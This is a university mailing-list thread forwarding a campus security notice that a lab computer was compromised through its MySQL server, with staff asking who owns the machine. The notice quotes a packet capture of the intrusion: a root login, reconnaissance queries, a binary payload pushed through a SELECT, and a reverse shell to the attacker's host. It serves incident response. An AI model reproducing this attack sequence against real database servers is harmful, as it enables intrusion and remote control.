[4eyes] [COE #74336] [UCSB-OIT #942765] 128.111.28.118: was compromised via its MySQL server

Yon Visell yonvisell at gmail.com
Thu Jan 19 20:26:20 PST 2017 

Matthew,

Is this on the wired network, so that they’re sure that it is linked to the 4eyes lab?

I’ll forward the notice to folks in my lab to make sure it’s not assigned to one of our machines.

- Yon

_________________________________________________________
Yon Visell, PhD
Assistant Professor

University of California, Santa Barbara  

Department of Electrical and Computer Engineering
Media Arts & Technology Graduate Program
Department of Mechanical Engineering (by courtesy)

www.re-touch-lab.com

Mobile: +1 267 800 8960
_________________________________________________________


> On Jan 19, 2017, at 5:58 PM, Matthew Turk <mturk at cs.ucsb.edu> wrote:
> 
> No one has claimed this machine yet. Please check yours and let me know. (There are usual suspects here, but I won't name names!)
> 
> 	Matthew
> 
> -----Original Message-----
> From: Matthew Turk [mailto:mturk21 at gmail.com] On Behalf Of Matthew Turk
> Sent: Wednesday, January 18, 2017 9:20 PM
> To: ilab-users at lists.cs.ucsb.edu
> Subject: FW: [COE #74336] [UCSB-OIT #942765] 128.111.28.118: was compromised via its MySQL server
> 
> Whose machine is 128.111.28.118? Please check - if it's yours, please let me know and see the info below.
> 
> Thanks,
> 	Matthew
> 
> -----Original Message-----
> From: Tier II Support Issues via CoE Support [mailto:help at engineering.ucsb.edu]
> Sent: Wednesday, January 18, 2017 10:41 AM
> To: holl at cs.ucsb.edu; mturk at cs.ucsb.edu
> Subject: [COE #74336] [UCSB-OIT #942765] 128.111.28.118: was compromised via its MySQL server
> 
> The following reply has been made regarding CoE Support ticket #74336:
> 
> Hi Matt and Tobias,
> 
> OIT has sent us this warning about ilab-118 machine that is compromised and needs to be looked into. Please read the information below.
> 
> On Wed Jan 18 10:24:26 2017, security at ucsb.edu wrote:
>> Greetings,
>> 
>> 128.111.28.118 has been compromised and has been blocked. The host was 
>> compromised via its MySQL server.
>> 
>> Before correcting any problems, please consider whether any sensitive 
>> personal information is stored on this device. If this device contains 
>> personal information and if it appears to have been compromised, 
>> please contact the UCSB Chief Information Security Officer, at 
>> CISO at oist.ucsb.edu or 893-5005 immediately.
>> 
>> To view the UCSB procedures when a device storing personal information 
>> has been compromised, please visit:
>> http://www.ets.ucsb.edu/security/sb-1386-and-ab-1298-guideline
>> 
>> Please investigate and advise. Here is a sample of traffic from the
>> trojan:
>> 
>> ----------sample----------
>> T 2017/01/18 02:45:47.091988 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [A]
>> ......
>> 
>> T 2017/01/18 02:45:47.497391 128.111.28.118:3306 ->
>> 188.132.176.26:3549 [AP]
>> J...
>> 5.5.11..+..EV``AdUY...!...............B~tMc*DXpHVW.mysql_native_password.
>> 
>> T 2017/01/18 02:45:47.684113 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [AP]
>> 
> V.......... at ........................root......Ndy....3......;.mysql.mysql_native_password.
>> 
>> T 2017/01/18 02:45:47.684972 128.111.28.118:3306 ->
>> 188.132.176.26:3549 [AP]
>> ...........
>> 
>> T 2017/01/18 02:45:47.878832 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [AP]
>> .....SELECT @@max_allowed_packet;
>> 
>> T 2017/01/18 02:45:47.899132 128.111.28.118:3306 ->
>> 188.132.176.26:3549 [AP]
>> 
> .....*....def....@@max_allowed_packet..?.........................1048576.........
>> 
>> T 2017/01/18 02:45:48.088029 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [AP]
>> .....SHOW VARIABLES LIKE 'VERS%';
>> 
>> T 2017/01/18 02:45:48.287569 128.111.28.118:3306 ->
>> 188.132.176.26:3549 [A]
>> ......
>> 
>> T 2017/01/18 02:45:48.331489 128.111.28.118:3306 ->
>> 188.132.176.26:3549 [AP]
>> 
> .....T....def.information_schema.VARIABLES.VARIABLES.Variable_name.VARIABLE_NAME... at .........M....def.information_schema.VARIABLES.VARIABLES.Value.VARIABLE_VALUE...................."......version.5.5.11-
>> ....version_comment.MySQL Community Server 
>> (GPL).....version_compile_machine.x86.....version_compile_os.Win64.......".
>> 
>> T 2017/01/18 02:45:48.682703 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [A]
>> ......
>> 
>> T 2017/01/18 02:45:50.427705 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [AP]
>> 
>> ....USE MYSQL
>> 
>> T 2017/01/18 02:45:50.428403 128.111.28.118:3306 ->
>> 188.132.176.26:3549 [AP]
>> ...........
>> 
>> T 2017/01/18 02:45:50.613848 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [AP]
>> .....SELECT @@version_compile_os;
>> 
>> T 2017/01/18 02:45:50.614481 128.111.28.118:3306 ->
>> 188.132.176.26:3549 [AP]
>> 
> .....*....def....@@version_compile_os............................Win64.........
>> 
>> T 2017/01/18 02:45:50.800022 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [AP]
>> .....SELECT @@plugin_dir;
>> 
>> T 2017/01/18 02:45:50.800759 128.111.28.118:3306 ->
>> 188.132.176.26:3549 [AP]
>> ....."....def....@@plugin_dir....2..................3...2C:\Program
>> Files\MySQL\MySQL Server 5.5\lib/plugin.........
>> 
>> T 2017/01/18 02:45:50.990204 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [A]
>> .l...SELECT
>> 
> 'MZ.\0.\0\0\0.\0\0\0..\0\0.\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0.\0\0\0....\0...!..L.!This
>> program cannot be run in DOS
>> 
> mode.\r\r\n$\0\0\0\0\0\0\0....[...[...[...R.\".G...R.%.3...R.5.\\...[...1...R.3.P...R./.Z...R.4.Z...R.7.Z...Rich[...\0\0\0\0\0\0\0\0PE\0\0d..\0?..M\0\0\0\0\0\0\0\0.\0\"
>> 
> ...\0\0.\0\0\0V\0\0\0\0\0\0D.\0\0\0.\0\0\0\0\0..\0\0\0\0.\0\0\0.\0\0.\0.\0\0\0\0\0.\0.\0\0\0\0\0\0..\0\0.\0\0...\0.\0\0\0\0\0.\0\0\0\0\0\0.\0\0\0\0\0\0\0\0.\0\0\0\0\0\0.\0\0\0\0\0\0\0\0\0\0.\0\0\0...\0..\0\0...\0P\0\0\0\0`.\0..\0\0\0P.\0..\0\0\0\0\0\0\0\0\0\0\0p.\0..\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0.\0\0..\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0.text\0\0\0p.\0\0\0.\0\0\0.\0\0\0.\0\0\0\0\0\0\0\0\0\0\0\0\0\0
>> 
> \0\0`.rdata\0\0..\0\0\0.\0\0\00\0\0\0.\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\0 at .data\0\0\0.5\0\0\0..\0\0.\0\0\0.\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\0..pdata\0\0!
>> 
> ..\0\0\0P.\0\0\n\0\0\0..\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\0 at .rsrc\0\0\0..\0\0\0`.\0\0.\0\0\0..\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\0 at .reloc\0\0..\0\0\0p.\0\0.\0\0\0..\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\0B\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
>> 
>> T 2017/01/18 02:45:50.990462 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [A]
>> 
> \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0.:\0tPH..D.\0\0I.\0H..B.\0\0I. at .H..?.\0\0I. at .H..<.\0\0I. at .H..9.\0\0I.@
>> 
> H..6.\0\0I.@(...3.\0\0fA. at 0...2..........H..!.\0\0I.\0H....\0\0I. at .H....\0\0I. at ...\Z.\0\0A. at ......\0\0fA. at ......\0\0A. at .A...\0\0\0I........:.u.H.B..8\0u....2..H....\0\0I.\0H....\0\0I. at .H....\0\0I. at .H....\0\0I. at .H....\0\0I.@
>> .....\0\0fA.@(.....\0\0A.@*................\0\0............. at SH..
>> H.J.I..H.....\0\0L..H..u.H.L$P...H..
>> [.H.|$03.H...I....H.|$0I..H..H....H.. [................H.\\$.WH..
>> 
> .:.I..H..tUH.\rT...H....\0\0I.\0H....\0\0I. at .H....\0\0I. at .....\0\0A. at ......\0\0fA. at ......\0\0A. at ...H.\\$0H..
>> 
> _.H.B..8\0tJH.\r....H....\0\0I.\0H..\0.\0\0I. at .H....\0\0I. at .H....\0\0I. at .H....\0\0I.@
>> ..H.\\$0H.. _.. at .\0\0\!
>> 0\0H.B..H..\0.L.....\0\0H.G.H..u?H.\r....H..
>> .\0\0H..H..(.\0\0H.C.H..0.\0\0H.C....8.\0\0f.C...H.\\$0H..
>> _.2.H.\\$0H..
>> _......H..(H.I.H..t..^.\0\0H..(..........H.\\$.H.t$.WH..
>> 
> H.B.H.q.H..H.R.D.\0H..H..I.\\0....\0\0L._.H..A....0\0H.G.H.W.D. at .H.R..\\.\0\0L._.H..A.C.H.....\0....\0\0H.\\$0H.t$8H.H..
>> 
> _...H..(H.J.H.....\0\0H.H..(...........:.u.H.B..8\0u.2..H....\0\0I.\0H....\0\0I. at .H....\0\0I. at .H....\0\0I. at .H....\0\0I.@
>> .....\0\0fA.@(.....\0\0A.@*..................H.t$ WATA
>> 
>> T 2017/01/18 02:45:50.990557 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [A]
>> VH.. .\0.\0\0H.l$HM..L.l$PH...`.\0\0..\0\0\0L...S.\0\0E3.H..\r.\0\0D.
>> 
> H.O.H..H.....\0\0A.T$.I..L..H...p.\0\0H..tYH.\\$@f.H...3.I....H..B.\\!.H.y.H.....#.\0\0A..D..H..I..H.....\0\0L....\0\0\0I..D.....\0\0H..u.H.\\$@H....\r\0\0.>\0L.l$PH.l$Ht/H...A.D$.H....0\03...H..H..H..A..H.t$XH..
>> A^A\\_.H.D$`.\0.H..H.t$XH..
>> 
> A^A\\_...............H.\\$.H.t$.WH..0H.z.H...3.H.?H..D.H at ..A.\0.\0\0H..H..H.y.3.....\0\0H.V.L..H..H..H.....\0\0H.T$HL..B\0\0\0H.T$(L..3.3..D$
>> 
> \0\0\0\0....\0\0...H......\0\0H.\\$@H.t$P3.H..0_...........H..(.\'.\0\0.\03.H..(............... at UVATH....\0\0H..\r.\0\0H3.H..$..\0\0H.....H.L$xD.EaE3.3.D.d$p.d(\0\03.H.D$XH.D$`L.d$PH......\0\0H..$..\0\0H..$..\0\0L..$..\0\0A..\0\0\0H..$.\0\0\0A....k.\0\0.^...>H.....\0\0.U.D.E.E3.A..D.d$(D.d$
>> 
> ..h.\0\0...H..3.H..$.\0\0\0fD..$.\0\0\0..$.\0\0\0H..$.\0\0\0..\".\0\0D.E.H..$.\0\0\0H..f..$.\0\0\0....\0\0H..$..\0\0H..$..\0\0.....\0\0\0H.L$p..:.\0\0H..$..\0\0H.\r3.\0\0A...\0\0.D$ph\0\0\0..$.\0\0\0..\0\0fD..$.\0\0\0H..$.\0\0\0H..$.\0\0\0H..$.!
>> 
> \0\0\0....\0\0....x\0\0\0H.D$PH..$..\0\0E3.H.D$HH.D$pE3.H.D$@L.d$8L.d$03..D$(.\0\0\0.D$
>> 
> .\0\0\0....\0\0..t0A..H.L$P...\0\0....\0\0=..\0\0t.H.L$P..~.\0\0H.L$X..s.\0\0A..H......\0\0H......\0\0L..$..\0\0..H..$..\0\0H3....\0\0H....\0\0A\\^]..........:.u.H.B..8\0u..x.\0u.2..H..\Z.\0\0I.\0H....\0\0I. at .H....\0\0I. at .H....\0\0I. at .H....\0\0I.@
>> 
> .....\0\0fA.@(.......H.\\$.WH..0..\0\0\0H....\n\0\0H..H..tUH.O.H....<.\0\0.C.H.O.H.I....\0\0L..-
>> ...L..f..3.3.H.D$(3..D$ ..z.\0\0H....i.
>> 
>> T 2017/01/18 02:45:50.990690 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [A]
>> 
> \0\03.H.\\$@H..0_.H..\0\0\0\0\0\0\0H.\\$@H..0_........2...............H.\\$.WH..PH.D$0....3..D$8.\0\0\0.D$D.\0\0\0..5.\0\0L.D$0.W(H......\0\0.....\0\0\0L.D$<H....\0\03.....\0\0....tHH.L$0L.D$8E3.3.H.|$(H.|$
>> ....\0\0....t#D.O.E3.3.3..D$
>> 
> .\0\0\0..d.\0\0....t.\0\0..H.L$0....\0\0..[.\0\0t...t\r3.H.\\$`H..P_.H..\0\0\0\0\0\0\0H.\\$`H..P_..UH..H.E...............ff...\0\0\0\0\0H;\r..\0\0u.H...f....u...H....U.\0\0.H..t7SH..
>> L..H.\r...\03...L.\0\0..u....\0\0H......\0\0...k.\0\0..H..
>> 
> [....H..(L...\n.\0D...\n.\0M..I..I...M..M;.s.H9\nt.H...I;.r.I;.s.H...VH..uOA. at .A;.rF..H.........H;.s5D.A.I...e.\0\0L..H..t!.\r[\n.\0H..\\\n.\0H..H...I.....\rB\n.\0..3.H..(..H..H.X.H.H.VWATAUAVH..0.\0\0L..3.L..H.\\$h.X..X..X\Z.\\$`..H;....;.u&...\0\0.\0.\0\0\0H.\\$
>> E3.E3.3.3....\0\03....\0\0..H;....;.u&...\0\0.\0.\0\0\0H.\\$
>> E3.E3.3.3....\0\03....\0\0.
>> 8\nu...\0\0\0H..8\nt.....\0\0\0..<wt*<rt&.P.\0\0.\0.\0\0\0H.\\$
>> 
> E3.E3.3.3..Z.\0\03....\0\0..$p.\0\0H..8\nu.H..8\nt...:.t.<tt*<bt&...\0\0.\0.\0\0\0H.\\$
>> E3.E3!
>> 
> .3.3....\0\03..:.\0\0..$q.\0\0<tu.A.\0@\0\0..D...\0.\0\0<bD.D.A.....\0.\0\0H.L$X..*\0\0.......\0\0..$p.\0\0wu...D....$x.\0\0.t$P....D....$x.\0\0.\\$P..\0\0\0..\Z\0\0;.u..L$X.Y)\0\0.L$\\.P)\0\03....\0\0..\0\0\0...\0\0..t$t.t$p....\0\0Ic.HcL.XH..H...L...&.\0...Hk.XI....D$0.\0\0\0.t$(.d$
>> 
> \0L..$.\0\0\0L..H..\nH....z.\0\0......\0\0.L.X..(\0\0.d.p\0HcD$PH..$p.\0\0.L.X.\Z\"\0\0L..H..$.\0\0\0H......\0\03......H..$.\0\0\0H......\0\0L....\0\03.H.L$h.+\r\0\0....t\Z...u.H.d$
>> \0E
>> 
>> T 2017/01/18 02:45:50.990877 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [A]
>> 3.E3.3.3..c.\0\0..u\nL.l$hM..u.L.-..\0\0.h\0\0\0L..3.H..$.\0\0\0..
>> 
> \0\0..$.\0\0\0..$.\0\0\0\0.\0\0..u.H..$.\0\0\0H..H.\r.%.\0..H.\r.%.\0H..H..$.\0\0\0H..$..\0\0;.t.H.AXH..$..\0\0H...\0\0\0H..$
>> 
> .\0\0I...x.\0\0H..I...m.\0\0H..H.\r..\0\0.^.\0\0H.\\..H..H.....\0\0L..3.H;.....\0\0M..H..H.....\0\0;.t.H.|$
>> E3.E3.3.3..n.\0\0L....\0\0H..I.....\0\0;.t.H.|$
>> E3.E3.3.3..D.\0\0L..$`.\0\0H..I.....\0\0;.t.H.|$
>> 
> E3.E3.3.3....\0\0...\0\0....$`.\0\03.I...\r.\0\0;.uEH..$.\0\0\0H.D$HH..$.\0\0\0H.D$@H.|$8H.|$0.|$(.t$
>> E3.E3.I..I......\0\0...D.\0\0H.|$xH.....\0\0...\0\0H..H..u-
>> 
> 3......I.......H.L$h........\0\0..D..$x.\0\0.l.\0\0L....\0\03.H.L$x...\0\0....t\Z...u.H.d$
>> 
> \0E3.E3.3.3..>.\0\0..t?H.L$x.L...H...D...I...<...H.L$h.2......\0\0..$`.\0\0..D..$x.\0\0...\0\0H.L$x3.A...\0\0H...6.\0\0H..$.\0\0\0H;...<.\0\08.....\0\0H...q.\0\0H.\\8..;\\uA.\\\0\0\0H....\Z\0\0H;.taL....\0\0...\0\0H...1.\0\0..tIH.d$
>> \0E3.E3.3.3..|.\0\0.2.;/t-L....\0\0...\0\0H.....\0\0..t.H.d$
>> \0E3.E3.3.3..H.\0\0I.....\0\0H..H.....\0\0H..!
>> ...\0\0H;....\0\0\0M..H..H.....\0\03.;.t.H.\\$
>> 
> E3.E3.3.3....\0\03.H....\Z\0\0;.uBH..$.\0\0\0H.D$HH..$.\0\0\0H.D$@H.\\$8H.\\$0.\\$(.t$
>> 
> E3.E3.I..H......\0\0....H..$.\0\0\0......t$`.\n.t$`...t$`H.L$x.....H.........$`.\0\03.I.......H.L$h.~...H..$.\0\0\0....\0\0H..$.\0\0\0..r.\0\0.E.\0\0..;.t.H..$.\0\0\0H..$.\0\0\0H.A.L.1.mH..$.\0\0\0H.9D..$x.\0\0..D..$x.\0\0I...1.\0\0Hc|$P.d.p\0E3.L..$.\0\0\0.\n.|$P...|$PIc..|.p\0t..L.X..#\0\0Hc..|.p\0t\n.L.X..#\0\0...\0\0\0...\0\0I..H..
>> 
>> T 2017/01/18 02:45:50.990879 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [AP]
>> 
> $h.\0\0H..0.\0\0A^A]A\\_^.H.t$.H.|$.ATH..0L..H...3.H.......u\'.l\r\0\0.\0.\0\0\0H.d$
>> 
> \0E3.E3.3.3..u.\0\0....\0\0\0..\0\0\0...\0\0..u.....\0\0\0..\0\0\0...\0\0.I...z...H..H..u\r..\r\0\0.\0.\0\0\0.PI...5.\0\0.\0\r\0\0D.
>> ...\0\0.
>> \0A..\0\0\0H.V.H.L$@.9\'\0\0H;.u\n...\0\0.8.u..|$@...\0\0D.
>> H.&\0H.f.\0..\0\0\0...\0\0..H.t$HH.|$PH..0A\\.H.\\$.H.t$.WH..
>> H..H...w|..\0\0\0H..H.E.H.\r=..\0H..u .k-
>> 
> \0\0..\0\0\0.9+\0\0..\0\0\0..\'\0\0H.\r...\0L..3.....\0\0H..H..u,9....\0t.H...y-
>> \0\0..t\r...\".\0\0.\0.\0\0\0...\0\0.\0.\0\0\0H.....S-
>> \0\0...\0\0.\0.\0\0\03.H.\\$0H.t$8H..
>> 
> _...3.D.B\n../\0\0.H.\\$.WH..PH..L....\0\0H.L$`3.3.H.\\$`.Y.\0\0;.t....u.E3.E3.3.3.H.\\$
>> 
> ...\0\0H.L$`H.L$0H;.u\ZH;....\0\0\03....\0\0;......\0\0\0H....\0\0H.|$@H.\\$HH.D$8H;.tM.O.\0\0.8.H.\0\0L.D$0..H.T$0E3.3...3\0\0.....t..&.\0\0.8.8...\0\0.8.t\n...\0\0.8\ru$...\0\0.8H..p.\0\0L.D$0E3.3.H.T$0.
>> /\0\0..H.L$`.......H.\\$hH..P_.....
>> 
>> T 2017/01/18 02:45:50.991064 128.111.28.118:3306 ->
>> 188.132.176.26:3549 [A]
>> ......
>> 
>> T 2017/01/18 02:45:50.991120 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [A]
>> 
> .............ff...\0\0\0\0\0L..M..t$H+....t(..........\0\0\0H..I..t....u...I...H...H...H..I...r&I........~L..L..I...M3.I.\0.......M..t.I......\0\0\0........\0\0\0H..I..tx...$.tuH..I..tiH........tbH..I..tV...$.tSH..I..tGH........t at H..I..t4...$.t1H..I..t%........t.H..I..t....$.t.H..I....<...I...H..H3.I...rE...t\nH....I....I..
>> r.H..H.Q.H.Q.H.Q.H.. I.. s.I..
>> 
> I...r.H..H.....I...I...r...H....I..... at SVWATAUH..@I....L..L..H..H..u*..t&.,.\0\0.\0.\0\0\0H!t$
>> E3.E3.3.3..6.\0\03....\0\03........u\'...\0\0.\0.\0\0\0H.d$
>> \0E3.E3.3.3....\0\03..Y.\0\03.H.......u\'...\0\0.\0.\0\0\0H.d$
>> 
> \0E3.E3.3.3...\n\0\03..&.\0\0..u.3....\0\0H..$.\0\0\0H....3\0\0..C. at ...\0\0\0H...P6\0\0...t*...t%Hc.H..H...L.....\0...Hk.XI...H.\r..\0\0..H.\r..\0\0H..L.....\0.B8.u%...t\Z...t.Hc.H..H......Hk.XI....A8.t\'...\0\0.\0.\0\0\0H.d$
>> 
> \0E3.E3.3.3...\n\0\03.H.t$0H..tV....|$xtH.C..x.H.....H..H...\nH...84\0\0...L$p...u.M;.u.3.H.t$0..A..$I..L.d$8..\nt...A..$\0H....3\0\0H..H.. at A]A\\_^[.H.\\$.H.t$.WH..
>> H..H..H..u\nH........jH!
>> 
> ..u..^....\\H...wCH.\r...\0..\0\0\0H..H.D.L..3.L......\0\0H..H..uo9....\0tPH...Q(\0\0..t+H...v.H...?(\0\0...\0\0.\0.\0\0\03.H.\\$0H.t$8H..
>> 
> _....\0\0H......\0\0...y.\0\0.......\0\0H......\0\0...`.\0\0..H.....H.\\$.H.t$.WH..
>> 
> .=...\0\0H.....\0H..tmH..u.H9....\0t_..5\0\0..uVH.....\0H..tJH..tEH.....\0\0H..H..H..t2...\0\0H;.v.H...<9=u.L..H...E5\0\0..t.H.....H..H.D8...3.H.\\$0H.t$8H..
>> _.... at SH..0H..3.H.......u$...\0\0.\0.\0\0\0H.d$
>> \0E3.E3.3.3....\0\03..`...\0\0..6\0\03.H=.
>> 
>> T 2017/01/18 02:45:50.991124 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [A]
>> .\0\0.....u$...\0\0.\0.\0\0\0H.d$
>> 
> \0E3.E3.3.3....\0\03..#..\0\0\0..\r\0\0.H.......H....\0\0\0...\0\0H..H..0[..H.\\$.H.t$.H.|$.ATH..0I..H..H....\0\0\0..\r\0\0.3.H.......u&.\".\0\0..\0\0\0..H.d$
>> \0E3.E3.3.3..*.\0\0..\0\0\0H.\'\0H..t.H.#\03.H.......u#...\0\0..\0\0\0
>> ..H.d$
>> 
> \0E3.E3.3.3....\0\0.zH.......H..H..u.3..fH...Q.\0\0..\0\0\0L.$.I....4\0\0H..H..u....\0\0.\0.\0\0\0...\0\0...1L..I..H.....\0\0..t.H.d$
>> \0E3.E3.3.3..Q.\0\0H..t.L.#3...\0\0\0...\0\0..H.\\$@H.t$HH.|$PH..0A\\.. at SH..
>> 
> I.....u......\0\0..u.3....\0\0..7\0\0..u....\0\0....=\0\0....\0\0H.....\0..;\0\0H..\Z.\0\0...\0\0..y..h4\0\0....:\0\0..x...7\0\0..x.3....\0\0..u.....\0\0..\0\0\0.i.\0\0....u9....\0\0....z.........\0\09..\0.\0u...!\0\0H..ux.6.\0\0..4\0\0.4.\0\0.g...uV..3\0\0...\0\0..\0\0\0.].\0\0H..H....*....\r..\0\0H......\0\0H....t.3...3\0\0....\0\0H.K.......
>> ...........u.3..O6\0\0..\0\0\0H..
>> 
> [.H.\\$.H.t$.H.|$.ATH..0I....L....\0\0\0..u.9...\0\0u.3...\0\0\0...t....u0L.\r&.\0\0M..t.A...D$
>> ..t.L....I...a....D$ .....\0\0\0!
>> L....I....>\0\0...D$
>> 
> ...u5..u1L..3.I....>\0\0L..3.I.......L....\0\0M..t.L..3.I..A....t....u7L....I...........#....L$
>> t.H....\0\0H..t.L....I.......D$
>> ....3.H.\\$@H.t$HH.|$PH..0A\\.H.\\$.H.t$.WH..
>> I....H.....u...=\0\0L....H..H.\\$0H.t$8H..
>> 
> _........H.L$.H...\0\0\0H.\ry.\0\0..c.\0\0L..d.\0\0L.\\$XE3.H.T$`H.L$X.K.\0\0H.D$PH.|$P\0tAH.D$8\0\0\0\0H.D$HH.D$0H.D$@H.D$(H..$.\0\0H.D$
>> 
> L.L$PL.D$XH.T$`3....\0\0.\"H..$.\0\0\0H....\0\0H..$.\0\0\0H...H..}.\0\0H....\0\0H..G.\0\0H..$.\
>> 
>> T 2017/01/18 02:45:50.991425 128.111.28.118:3306 ->
>> 188.132.176.26:3549 [A]
>> ......
>> 
>> T 2017/01/18 02:45:50.991744 128.111.28.118:3306 ->
>> 188.132.176.26:3549 [A]
>> ......
>> 
>> T 2017/01/18 02:45:51.015642 128.111.28.118:3306 ->
>> 188.132.176.26:3549 [A]
>> ......
>> 
>> T 2017/01/18 02:45:51.176555 188.132.176.26:3549 ->
>> 128.111.28.118:3306 [A]
>> 
> 0\0\0H..H.\0\0....\0\0..\0.....\0\0.\0\0\0H....\0\0H.D$hH....\0\0H.D$p..n.\0\0....\0\0..\0\0\0.v=\0\03...N.\0\0H.\r..\0\0..9.\0\0.=b.\0\0\0u\n..\0\0\0.N=\0\0....\0\0...\0.H....\n.\0\0H...\0\0\0...L.\r9.\0\03.I..D. at .;\nt+..I....-
>> 
> r..A....w..\r\0\0\0...D.....\0\0\0...A.F..H.A.D....H..(.o1\0\0H..u.H..K.\0\0..H...H..(.H..(.O1\0\0H..u.H../.\0\0..H...H..(. at SH..
>> ...+1\0\0H..u.H....\0\0..H.......1\0\0L....\0\0H..t.L.P....;...A..H..
>> 
> [....L$.H..(E3..\0.\0\03...X.\0\0H..!.\0\0H..t#L.D$0A..\0\0\03.H...D$0.\0\0\0..&.\0\0..\0\0\0H..(.H..(H.\r..\0\0....\0\0H.%..\0\0\0H..(...H.\r..\0\0. at SH....\0\0.d$p\0H.L$t3.A..\0\0\0.L\r\0\0L.\\$pH..$..\0\0H..$..\0\0L.\\$HH.D$P....\0\0H..$..\0\0H.T$@H..E3....\0\0H..t;H.d$8\0H.T$@H.L$`H.L$0H.L$XL..H.L$(H..$..\0\0L..H.L$
>> 3..Q.\0\0.
>> 
> H..$..\0\0H..$..\0\0H..$..\0\0H..$..\0\0H..$..\0\0.D$p..\0..D$t.\0\0\0H..$.\0\0\0....\0\03.......\0\0H.L$H....\0\0..u...u..H...:\0\0..N.\0\0...\0.H......\0\0H....\0\0[....H.\\$.H.l$.H.t$.WH..0H..H.\r..\0\0A..I..H... at .\0\0H..t\ZL.T!
>> $`D..L..H..H..L.T$ ...%..\0\0\0.o:\0\0L.\\$`D..L..H..H..L.\\$
>> .h...H.\\$@H.l$HH.t$PH..0_....H.\\$.H.l$.H.t$.WH..
>> 3.H.....H.......H..H..u(9...\0\0v ....
>> .\0\0D....\0\0D;...\0\0A...G.;.u.H.l$8H.t$@H..H.\\$0H..
>> _.H..H.X.H.h.H.p.H.x ATH..
>> 
> 3.H..H..A...E3.H..H....9\0\0H..H..u*9...\0\0v\"......\0\0D....\0\0D;.g.\0\0A..A.G.A;.u.H.l$8H.t$@H.|$HH..H.\\$0H..
>> A\\..H..H.X.H.h.H.p.H.x ATH..
>> 
> 3.H..H..A...H..H.......H..H..u/H..t*9...\0\0v\"......\0\0D....\0\0D;...\0\0A..A.G.A;.u.H.l$
>> 
>> T 2017/01/18 02:45:54.767136 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [A]
>> ......
>> 
>> T 2017/01/18 02:45:55.049876 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> Microsoft Windows [Version 6.1.7601]
>> 
>> T 2017/01/18 02:45:55.448211 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [A]
>> ......
>> 
>> T 2017/01/18 02:45:55.448772 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> .
>> Copyright (c) 2009 Microsoft Corporation. All rights reserved..
>> .
>> C:\ProgramData\MySQL\MySQL Server 5.5\data>
>> 
>> T 2017/01/18 02:45:55.776319 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [A]
>> ......
>> 
>> T 2017/01/18 02:46:19.130812 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [AP]
>> ipconfig
>> 
>> 
>> T 2017/01/18 02:46:19.131472 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> ipconfig
>> 
>> 
>> T 2017/01/18 02:46:19.304083 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [A]
>> .
>> Windows IP Configuration.
>> .
>> .
>> Ethernet adapter Local Area Connection:.
>> .
>> Connection-specific DNS Suffix . : cs.ucsb.edu.
>> IPv4 Address. . . . . . . . . . . : 128.111.28.118.
>> Subnet Mask . . . . . . . . . . . : 255.255.255.192.
>> Default Gateway . . . . . . . . . : 128.111.28.65.
>> .
>> Ethernet adapter Local Area Connection 2:.
>> .
>> Connection-specific DNS Suffix . : .
>> IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4::1.
>> Link-local IPv6 Address . . . . . : fe80::b57a:afce:a5c3:9380%15.
>> IPv4 Address. . . . . . . . . . . : 10.37.130.2.
>> Subnet Mask . . . . . . . . . . . : 255.255.255.0.
>> Default Gateway . . . . . . . . . : .
>> .
>> Ethernet adapter Local Area Connection 2:.
>> .
>> Connection-specific DNS Suffix . : .
>> IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4:1::1.
